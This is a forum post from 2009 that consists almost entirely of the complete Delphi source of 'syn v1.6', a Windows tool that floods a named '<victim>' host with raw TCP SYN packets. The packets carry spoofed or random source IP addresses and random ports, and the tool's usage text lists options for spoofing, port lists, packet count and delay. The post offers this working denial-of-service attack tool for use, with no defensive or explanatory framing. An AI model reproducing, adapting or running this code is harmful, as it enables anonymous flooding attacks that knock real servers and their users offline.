Gonzalez Posted September 29, 2009 Report Posted September 29, 2009 program syn;{$APPTYPE CONSOLE}uses Windows, Winsock;const Banner = #13#10'syn v1.6 [14 Aug 2003]'#13#10#13#10 + 'http://www.loranbase.com'#13#10;type TPorts = array of Word; TSynOptions = packed record Delay: Cardinal; DstPorts: TPorts; SockAddr: TSockAddrIn; Num: Cardinal; RandomSeek: Integer; Sended: Cardinal; Socket: TSocket; SpoofIP: Cardinal; SrcPorts: TPorts; end; WordArray = ^TWordArray; TWordArray = array [0..0] of Word; PIPhdr = ^TIPhdr; TIPhdr = packed record ip_verlen: Byte; ip_tos: Byte; ip_len: Word; ip_id: Word; ip_off: Word; ip_ttl: Byte; ip_p: Byte; ip_sum: Word; ip_src: Cardinal; ip_dst: Cardinal; end; PTCPhdr = ^TTCPhdr; TTCPhdr = packed record tcp_src : Word; tcp_dst : Word; tcp_seq : Cardinal; tcp_ack : Cardinal; tcp_off : Byte; tcp_flags : Byte; tcp_win : Word; tcp_sum : Word; tcp_urp : Word; end; Ppseudohdr_tcp = ^Tpseudohdr_tcp; Tpseudohdr_tcp = packed record saddr : Cardinal; daddr : Cardinal; zero : Byte; protocol : Byte; length : Word; tcphdr : TTCPhdr; end;const Len = 40;var Buf: array [0..(Len - 1)] of Char; IPhdr: PIPhdr = @Buf[0]; TCPhdr: PTCPhdr = @Buf[20]; WSAData: TWSAData; i, j: integer; UseDelay: Boolean; SynOpt: TSynOptions; LastUpdate: Cardinal = 0;function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean;begin Result := Force or ((GetTickCount - LastUpdate) >= DelayValue); if Result then LastUpdate := GetTickCount;end;function StrtoInt(const S: string): integer;var E: integer;begin Val(S, Result, E);end;function InttoStr(const Value: integer): string;var S: string[11];begin Str(Value, S); Result := S;end;function StrToIntDef(const S: string; Default: integer): integer;var E: integer;begin Val(S, Result, E); if E <> 0 then Result := Default;end;function ExtractFileName(const Path: string): string;var i, L: integer; Ch: Char;begin L := Length(Path); for i := L downto 1 do begin Ch := Path[i]; if (Ch = '\') or (Ch = '/') then begin Result := Copy(Path, i + 1, L - i); Break; end; end;end;function CheckSum(data: WordArray; size: Integer): Word;var i, sum: Integer;begin sum := 0; i := 0; while size > 1 do begin Inc(sum, data^[i]); Dec(size, 2); Inc(i); end; if size <> 0 then Inc(sum, data^[i]); sum := (sum shr 16) + (sum and $ffff); Inc(sum, sum shr 16); Result := not sum;end;function ValidPort(const Port: string): Boolean;var prt: Integer;begin prt := StrtoIntDef(Port, -1); Result := (prt > -1) and (prt < 65536); // a valid port must be between -1 and 65536end;function GetPorts(Ports: string): TPorts; procedure AddPort(const Port: string); begin if ValidPort(Port) then begin SetLength(Result, Length(Result) + 1); Result[High(Result)] := StrtoInt(Port); end else Writeln('Skipping invalid port: ' + Port); end;var i: Integer; S: string;begin i := Pos(',', Ports); while i > 0 do begin S := Copy(Ports, 1, i - 1); AddPort(S); Delete(Ports, 1, i); i := Pos(',', Ports); end; AddPort(Ports);end;function GetRandomValue(const Range: Integer): Integer; // function for getting different randombegin // values between very short times SynOpt.RandomSeek := (SynOpt.RandomSeek xor Range) + 1; Result := (Random(High(Integer)) xor SynOpt.RandomSeek) mod Range;end;function GetRandomIP: Cardinal;var IPArray: array [0..3] of Byte; i: Integer;begin for i := 0 to 3 do IPArray[i] := GetRandomValue(255) + 1; Move(IPArray, Result, Sizeof(Result));end;function Resolve(const host: PChar): Cardinal; // function for resolving host to ipvar InAddr: TInAddr; HostEnt: PHostEnt;begin InAddr.S_addr := inet_addr(host); // convert ip address format (ex: to cardinal if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it begin HostEnt := GetHostByName(host); if not Assigned(HostEnt) then // if couldn't resolve the host then exit begin Writeln('Error: Unable to resolve host: ' + host); Halt(0); end; Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); end; Result := InAddr.S_addr;end;procedure CreateSocket;begin SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if SynOpt.Socket = INVALID_SOCKET then begin Writeln('Error on creating socket'); Halt(0); end; if SetSockOpt(SynOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then begin // if can't set the IP_HDRINCL option then exit Writeln('Error: IP_HDRINCL'#13#10 + '(Note that this program only works on Windows XP)'); Halt(0); end;end;var SeudoBuf: array [0..31] of Char;procedure SendSyn(const sport, dport: Word); procedure SendSyn_FillIPhdr; begin IPhdr.ip_verlen := $45; IPhdr.ip_tos := 0; IPhdr.ip_len := htons(Len); IPhdr.ip_id := GetRandomValue(High(Word)) + 1; IPhdr.ip_ttl := 255; IPhdr.ip_p := 6; // 6 = TCP if SynOpt.SpoofIP = 0 then IPhdr.ip_src := GetRandomIP else IPhdr.ip_src := SynOpt.SpoofIP; IPhdr.ip_dst := SynOpt.SockAddr.sin_addr.S_addr; IPhdr.ip_sum := CheckSum(@IPhdr^, 20); end; procedure SendSyn_FillTCPhdr; var PSeudohdr: Ppseudohdr_tcp; begin if sport = 0 then TCPhdr.tcp_src := GetRandomValue(High(Word)) + 1 else TCPhdr.tcp_src := htons(sport); if dport = 0 then TCPhdr.tcp_dst := GetRandomValue(High(Word)) + 1 else TCPhdr.tcp_dst := htons(dport); TCPhdr.tcp_seq := GetRandomValue(High(Integer)) + 1; TCPhdr.tcp_ack := GetRandomValue(High(Integer)) + 1; TCPhdr.tcp_flags := $02; // 0x02 = syn flag TCPhdr.tcp_win := GetRandomValue(High(Word)) + 1; TCPhdr.tcp_urp := GetRandomValue(High(Word)) + 1; FillChar(SeudoBuf, Sizeof(SeudoBuf), 0); PSeudohdr := Ppseudohdr_tcp(@SeudoBuf); // for a correct tcp checksum PSeudohdr.saddr := IPhdr.ip_src; // we must calculate it with a pseudo header PSeudohdr.daddr := IPhdr.ip_dst; PSeudohdr.protocol := 6; PSeudohdr.length := htons(20); PSeudohdr.tcphdr := TCPhdr^; TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32);end;begin FillChar(Buf, Len, 0); SendSyn_FillIPhdr; SendSyn_FillTCPhdr; Sendto(SynOpt.Socket, Buf, Len, 0, SynOpt.SockAddr, Sizeof(SynOpt.SockAddr));end;procedure SetDefaultOptions;begin SynOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1))); SetLength(SynOpt.DstPorts, 1); SynOpt.DstPorts[0] := 0; SynOpt.SockAddr.sin_family := AF_INET; SynOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1; SetLength(SynOpt.SrcPorts, 1); SynOpt.SrcPorts[0] := 0;end;procedure SetParams;var i, pcount: Integer; pstr: string; Ch: Char;begin pcount := ParamCount; for i := 2 to pcount do begin pstr := ParamStr(i); Ch := #0; if Length(pstr) = 2 then begin if pstr[1] = '-' then Ch := pstr[2]; end; if Ch = #0 then Continue; case Ch of 'S': SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1))); 'p': begin SynOpt.DstPorts := GetPorts(ParamStr(i + 1)); if Length(SynOpt.DstPorts) = 0 then begin Writeln('No valid ports found on the dst port list'); Halt(0); end; end; 's': begin SynOpt.SrcPorts := GetPorts(ParamStr(i + 1)); if Length(SynOpt.SrcPorts) = 0 then begin Writeln('No valid ports found on the src port list'); Halt(0); end; end; 'n': SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0); 'd': SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0); end; end;end;procedure Usage(const Path: string); begin Write( 'usage: ' + Path + ' <victim> [options]'#13#10#13#10 + 'Options:'#13#10 + ' -S: Spoof host (0 is random (default))'#13#10 + ' -p: Comma separated list of dest ports (0 is random (default))'#13#10 + ' -s: Comma separated list of src ports (0 is random (default))'#13#10 + ' -n: Num of packets (0 is continuous (default))'#13#10 + ' -d: Delay (in ms) (default 0)'#13#10 ); Halt(0);end;begin Writeln(Banner); if ParamCount < 1 then Usage(ExtractFileName(ParamStr(0))); WSAStartUp($0101, WSAData); FillChar(SynOpt, Sizeof(SynOpt), 0); CreateSocket; try Randomize; SetDefaultOptions; if ParamCount > 1 then SetParams; UseDelay := SynOpt.Delay > 0; repeat for i := 0 to High(SynOpt.DstPorts) do begin for j := 0 to High(SynOpt.SrcPorts) do begin SendSyn(SynOpt.SrcPorts[j], SynOpt.DstPorts[i]); if UseDelay then Sleep(SynOpt.Delay); end; end; Inc(SynOpt.Sended); if CanUpdate(50, SynOpt.Sended = SynOpt.Num) then SetConsoleTitle(PChar('Count: ' + InttoStr(SynOpt.Sended))); until SynOpt.Sended = SynOpt.Num; finally CloseSocket(SynOpt.Socket); WSACleanUp; end;end. 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